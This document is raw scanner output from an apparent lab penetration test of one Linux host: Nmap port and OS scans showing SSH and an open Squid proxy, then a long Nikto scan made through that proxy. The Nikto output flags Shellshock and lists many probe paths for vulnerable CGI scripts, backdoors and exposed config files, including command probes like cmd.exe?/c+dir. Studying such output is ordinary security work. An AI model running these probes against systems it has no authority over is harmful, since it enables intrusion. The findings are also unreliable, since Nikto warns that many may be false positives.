Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.1.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00015s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.47 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
() Status: Up
     
192.168.1.9:3128 set it as proxy

./http_scan_proxy.sh 192.168.1.9 80 3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.9
+ Target Hostname:    192.168.1.9
+ Target Port:        80
+ Proxy:              192.168.1.9:3128
+ Using Encoding:     Random URI encoding (non-UTF8)
+ Start Time:         2017-01-11 21:06:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ lines
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 02:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ /webcgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-915/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin/cart32.exe: request cart32.exe/cart32clientlist
+ /htbin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgibin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgis/cart32.exe: request cart32.exe/cart32clientlist
+ /scripts/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-exe/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-perl/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin-sdb/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/classified.cgi: Check Phrack 55 for info by RFP
+ /fcgi-bin/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-exe/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-bin-sdb/classified.cgi: Check Phrack 55 for info by RFP
+ /htbin/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-win/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-exe/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-perl/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /webcgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-bin/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgis/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-915/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-win/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /fcgi-bin/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /scripts/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-win/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /webcgi/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-915/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-bin/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-perl/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgibin/lwgate: Check Phrack 55 for info by RFP
+ /scripts/lwgate: Check Phrack 55 for info by RFP
+ /cgi-915/LWGate: Check Phrack 55 for info by RFP
+ /cgi/LWGate: Check Phrack 55 for info by RFP
+ /cgi-exe/LWGate: Check Phrack 55 for info by RFP
+ /webcgi/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /htbin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgis/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /scripts/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-exe/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-perl/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin-sdb/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-915/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgibin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /fcgi-bin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgi-exe/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /webcgi/finger: finger other users, may be other commands?
+ /cgi-bin/finger: finger other users, may be other commands?
+ /cgi-win/finger: finger other users, may be other commands?
+ /fcgi-bin/finger: finger other users, may be other commands?
+ /cgi-bin-sdb/finger: finger other users, may be other commands?
+ /htbin/finger.pl: finger other users, may be other commands?
+ /cgibin/finger.pl: finger other users, may be other commands?
+ /cgi-perl/finger.pl: finger other users, may be other commands?
+ /cgi-bin-sdb/finger.pl: finger other users, may be other commands?
+ /cgi-915/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-win/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /fcgi-bin/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-perl/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgibin/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /scripts/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /htbin/photo/protected/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.
+ /cgi-915/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /fcgi-bin/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ /webcgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /htbin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgibin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-win/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /fcgi-bin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-perl/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /webcgi/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-win/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-perl/html2wml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-915/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /scripts/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-perl/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi-bin-sdb/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-win/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /fcgi-bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-exe/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /htbin/gH.cgi: Web backdoor by gH
+ /scripts/gH.cgi: Web backdoor by gH
+ /cgi-win/gH.cgi: Web backdoor by gH
+ /fcgi-bin/gH.cgi: Web backdoor by gH
+ /cgi-bin-sdb/gm-cplog.cgi: GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cgi-bin/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgis/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgi-915/AT-admin.cgi: Admin interface...
+ /cgi-bin-sdb/AT-admin.cgi: Admin interface...
+ /cgi-bin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /htbin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgibin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-915/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-bin-sdb/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-perl/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /webcgi/bannereditor.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-bin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgibin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgis/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-win/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin-sdb/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /webcgi/bizdb1-search.cgi: This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
+ /cgi-bin/blog/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ OSVDB-2878: /cgibin/moin.cgi?test: MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /WEB-INF./web.xml: Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /webcgi/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /cgi-bin-sdb/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /webcgi/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-915/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-perl/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /webcgi/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgibin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-exe/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ OSVDB-11741: /htbin/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ OSVDB-11741: /scripts/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ /cgi-915/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /fcgi-bin/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /cgi-exe/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /cgi-exe/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /cgi-perl/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /webcgi/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /scripts/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-win/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-bin-sdb/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ OSVDB-319: /scripts/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-319: /cgi-bin-sdb/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-11093: /cgi/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-11093: /cgis/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ OSVDB-11871: /webcgi/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-exe/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-perl/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-bin-sdb/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ /cgibin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-exe/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgi-bin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgibin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgis/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /htbin/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-win/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-exe/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgibin/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd1.exe?/c+dir: cmd1.exe can execute arbitrary commands
+ /cgibin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgis/archie: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/archie: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgi-win/calendar: Gateway to the unix command, may be able to submit extra commands
+ /htbin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi-exe/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi/redirect: Redirects via URL from form
+ /scripts/redirect: Redirects via URL from form
+ /cgi-win/redirect: Redirects via URL from form
+ /cgi-exe/redirect: Redirects via URL from form
+ /cgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgis/uptime: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
+ /webcgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi-915/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /scripts/nph-error.pl: Gives more information in error messages
+ /cgi-perl/post-query: Echoes back result of your POST
+ /cgi-bin-sdb/post-query: Echoes back result of your POST
+ /cgi-915/query: Echoes back result of your GET
+ /htbin/query: Echoes back result of your GET
+ /scripts/query: Echoes back result of your GET
+ /fcgi-bin/query: Echoes back result of your GET
+ /cgibin/test-env: May echo environment variables or give directory listings
+ /cgis/test-env: May echo environment variables or give directory listings
+ /cgi-exe/test-env: May echo environment variables or give directory listings
+ /cgi-perl/test-env: May echo environment variables or give directory listings
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /852566C90012664F: This database can be read using the replica ID without authentication.
+ /hidden.nsf: This database can be read without authentication. Common database name.
+ /cgi-915/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgis/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-perl/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-bin-sdb/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ OSVDB-6666: /webcgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /cgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /htbin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /scripts/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
+ OSVDB-55370: /cgibin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /scripts/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /fcgi-bin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /cgi-perl/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-915/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-bin-sdb/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ /cgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /htbin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /fcgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-exe/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-915/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /fcgi-bin/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /cgi-perl/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ /cgi-915/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /cgi-bin/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /scripts/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ /webcgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-915/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgis/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /scripts/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /htbin/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
